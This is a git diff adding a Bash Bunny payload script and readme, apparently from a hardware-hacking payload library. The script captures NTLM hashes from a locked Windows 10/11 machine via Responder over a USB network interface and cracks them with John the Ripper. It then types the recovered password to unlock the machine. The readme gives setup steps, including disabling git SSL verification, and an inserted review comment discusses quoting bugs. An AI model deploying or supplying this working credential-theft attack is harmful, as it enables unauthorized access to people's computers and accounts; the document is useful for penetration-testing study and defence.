diff --git a/payloads/library/credentials/BunnyPicker/payload.txt b/payloads/library/credentials/BunnyPicker/payload.txt
new file mode 100644
index 000000000..f2834aab8
--- /dev/null
+++ b/payloads/library/credentials/BunnyPicker/payload.txt
@@ -0,0 +1,111 @@
+#!/bin/bash
+#
+#Author: rf_bandit
+#Version: Version 1.0
+#Credit: Hak5Darren, Mubix, catatonic, mame82
+#Firmware: 1.7
+#Date: May 2023
+#
+# Options
+RESPONDER_OPTIONS="-w -r -d -P"
+LOOTDIR=/root/udisk/loot/bunnypicker
+WORDFILE=
+#eg /tools/john/password.lst
+# or install via tools folding in arming mode (/tools/)
+PAYLOAD_DIR=/root/udisk/payloads/$SWITCH_POSITION
+
+# Check for responder and john
+REQUIRETOOL responder
+REQUIRETOOL john
+
+# Setup Attack
+LED SETUP
+
+# Use RNDIS for Windows. Mac/*nix use ECM_ETHERNET
+ATTACKMODE HID RNDIS_ETHERNET
+#ATTACKMODE ECM_ETHERNET
+
+# Set convenience variables
+GET TARGET_HOSTNAME
+GET TARGET_IP
+
+# Setup named logs in loot directory
+mkdir -p $LOOTDIR
+HOST=${TARGET_HOSTNAME}
+# If hostname is blank set it to "noname"
+[[ -z "$HOST" ]] && HOST="noname"
+COUNT=$(ls -lad $LOOTDIR/$HOST* | wc -l)
+COUNT=$((COUNT+1))
+mkdir -p $LOOTDIR/$HOST-$COUNT
+
+# As a backup also copy logs to a loot directory in /root/loot/
+mkdir -p /root/loot/bunnypicker/$HOST-$COUNT
+
+# Check target IP address. If unset, blink RED and end.
+if [ -z "${TARGET_IP}" ]; then
+ LED FAIL2
+ exit 1
+fi
+
+# Set LED yellow, run attack
+LED ATTACK
+cd /tools/responder
+
+# Clean logs directory
+rm logs/*
+
+# Run Responder with specified options
+python Responder.py -I usb0 $RESPONDER_OPTIONS &
+
+# Wait until NTLM log is found
+until [ -f logs/*NTLM* ]
+do
+ # Ima just loop here until NTLM logs are found
+ sleep 1
+done
+
+# copy logs to loot directory
+cp logs/* /root/loot/bunnypicker/$HOST-$COUNT
+cp logs/* $LOOTDIR/$HOST-$COUNT
+
+# Sync USB disk filesystem
+sync
+
+#kill responder
+killall python
+killall python
+killall python
+
+#Cracking begins!
+cd /tools/john
+LED STAGE1
+#This should be a small wordlist as we are looking for lowhanging fuit. We can do 100K passwords in ~1 second.
+#We could go CUCMBER PLAID here but its probably not needed
+./john --wordlist=$WORDFILE --pot=/root/loot/bunnypicker/$HOST-$COUNT/john.pot /root/loot/bunnypicker/$HOST-$COUNT/*.txt
+
+
+# Check john.pot If empty blink RED and end. Move to offline attack.
+if [[ -z $(grep '[^[:space:]]' /root/loot/bunnypicker/$HOST-$COUNT/john.pot) ]]; then
+ LED FAIL3
+ exit 1
+fi
+
+#This will copy our cracked password to the loot folder for future use.
+LED STAGE2
+awk NR==1 /root/loot/bunnypicker/$HOST-$COUNT/john.pot | cut -d: -f2 > $LOOTDIR/$HOST-$COUNT/$HOST-$COUNT-pass.txt
+echo -n "STRING " > $PAYLOAD_DIR/pass.txt
+cat $LOOTDIR/$HOST-$COUNT/$HOST-$COUNT-pass.txt >> $PAYLOAD_DIR/pass.txt
+
+#This should unlock the machine with our cracked password.
+#$PAYLOAD_DIR would not work with QUACK
+QUACK ESC
+DELAY 100
+QUACK $SWITCH_POSITION/pass.txt
+QUACK ENTER
+rm $PAYLOAD_DIR/pass.txt
+
+LED CLEANUP
+sync
+
+# When the light turns green its a hacked machine.
+LED FINISH
diff --git a/payloads/library/credentials/BunnyPicker/readme.md b/payloads/library/credentials/BunnyPicker/readme.md
new file mode 100644
index 000000000..962a15118
--- /dev/null
+++ b/payloads/library/credentials/BunnyPicker/readme.md
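Review bot: `HOST` is taken straight from the target (`GET TARGET_HOSTNAME`) and then expanded unquoted in every loot path of this hunk (`mkdir -p $LOOTDIR/$HOST-$COUNT`, both `cp logs/*` lines, the `./john`, `awk` and `cat` lines), so a hostname containing whitespace or glob characters word-splits those paths, and `COUNT=$(ls -lad $LOOTDIR/$HOST* | wc -l)` miscounts for the same reason; quote the expansions and normalise the name once after the noname fallback, e.g. `HOST=${HOST//[^[:alnum:]._-]/_}`. Separately, `WORDFILE=` defaults to empty and is never validated before `./john --wordlist=$WORDFILE ...`, so an unconfigured wordlist ends in `LED FAIL3`, which the readme documents as "hash not cracked" and which therefore misreports a configuration error. A guard beside the `REQUIRETOOL` lines, `[[ -r "$WORDFILE" ]] || { LED FAIL; exit 1; }`, with its own entry in the readme status table, would make that failure attributable.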
@@ -0,0 +1,117 @@
+# Bunnypicker (Win10 Lockpicker for Bash Bunny)
+.______ __ __ .__ __. .__ __. ____ ____ .______ __ ______ __ ___ _______ .______
+| _ \ | | | | | \ | | | \ | | \ \ / / | _ \ | | / || |/ / | ____|| _ \
+| |_) | | | | | | \| | | \| | \ \/ / | |_) | | | | ,----'| ' / | |__ | |_) |
+| _ < | | | | | . ` | | . ` | \_ _/ | ___/ | | | | | < | __| | /
+| |_) | | `--' | | |\ | | |\ | | | | | | | | `----.| . \ | |____ | |\ \----.
+|______/ \______/ |__| \__| |__| \__| |__| | _| |__| \______||__|\__\ |_______|| _| `._____|
+ ,
+ /| __
+ / | ,-~ /
+ Y :| // /
+ | jj /( .^
+ >-"~"-v"
+ / Y
+ jo o |
+ ( ~T~ j
+ >._-' _./
+ / "~" |
+ Y _, |
+ /| ;-"~ _ l
+/ l/ ,-"~ \
+\//\/ .- \
+ Y / Y -Row
+ l I !
+ ]\ _\ /"\
+(" ~----( ~ Y. )
+~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+
+Author: rf_bandit
+Version: Version 1.0
+Credit: Hak5Darren, Mubix, catatonic, mame82
+Firmware: 1.7
+Target: Windows 10/11
+Date: May 2023
+
+## Description
+This is based on Quickcreds, Jackalope, and Win10Lockpicker (for the OG P4wnP1)
+Snags credentials from locked machines
+Implements a responder attack. Saves creds to the loot folder on the USB Disk
+Looks for *NTLM* log files
+Cracks hash with John the Ripper. Best with a smaller dictionary.
+Saves cracked hash to loot folder
+Quacks password and unlocks machine
+
+On a current (May 2023) Win10/Win11 machine, it shouldn't take more about 35 seconds to get a hash.
+If attack stage lasts longer than ~1, try disconnecting/reconnecting from wifi/network.
+We can run through 100K simple passwords in 1 second.
+Best time I got was 29.60 seconds from Bash Bunny boot to machine unlock.
+
+
+
+## Configuration
+.
+Configured for Windows. Not tested on Mac/*nix
+The path to the wordfile needs to be configured, eg /tools/ or /tools/john/password.lst (included) . The most straightforwrd way to get a large wordlist is to put it in the /tools folder in arming mode.
A future version could check for a wordlist in /tools and if not found fallback to the included /tools/john/password.lst.
+
+
+## Requirements
+
+Responder must be in /tools/responder/
+(Can be otained from https://forums.hak5.org/topic/40971-info-tools/)
+JtR must be in /tools/john
+Requires initial setup (below)
+
+## Initial Setup
+Install responder from https://forums.hak5.org/topic/40971-info-tools/
+
+Replace /etc/apt/sources.list with:
+deb http://archive.debian.org/debian/ jessie main non-free contrib
+deb-src http://archive.debian.org/debian/ jessie main non-free contrib
+deb http://archive.debian.org/debian-security/ jessie/updates main non-free contrib
+deb-src http://archive.debian.org/debian-security/ jessie/updates main non-free contrib
+
+apt update (DO NOT RUN apt upgrade as it will break RNDIS_ETHERNET. Not entirely clear why.)
+
+The john package included can't handle NTLM hashes so we will make our own.
+Install gcc and git if you don't have them.
+
+apt-get install gcc
+
+apt-get install git
+git config --global http.sslverify "false" (this is insecure but I'm not worried)
+
+git clone https://github.com/openwall/john
+
+cd john
+./configure && make
+mv run /tools/john
+cd ..
+rm -r john (not required but a space saving measure)
+
+
+## STATUS
+
+
+| Status | Description |
+| ------------------- | ---------------------------------------- |
+| LED SETUP | Starting |
+| LED ATTACK | Grabbing creds |
+| LED STAGE1 | Running JtR |
+| LED STAGE2 | Unlocking |
+| LED CLEANUP | Sync to disk |
+| LED FINISH | Trap is clean |
+| FAIL1 | Responder not found at /tools/responder |
+| FAIL2 | Target did not aquire IP address |
+| FAIL3 | Hash not cracked - move to offline attack|
+
+## ADDITIONAL NOTES
+
+For debugging its better to use LED B for STAGE1 and LED W for STAGE2 because its easier to pinpoint failure.
+A future version could check for a wordlist in /tools and if not found fallback to /tools/john/password.lst.
+Might also steal catatonic's use of the switch (very cool) to initiate password quacking to make the payload more versatile on both locked
+and unlocked machines.
+
+This was fun to make. Thanks to everyone who put in all the hard work before me.
+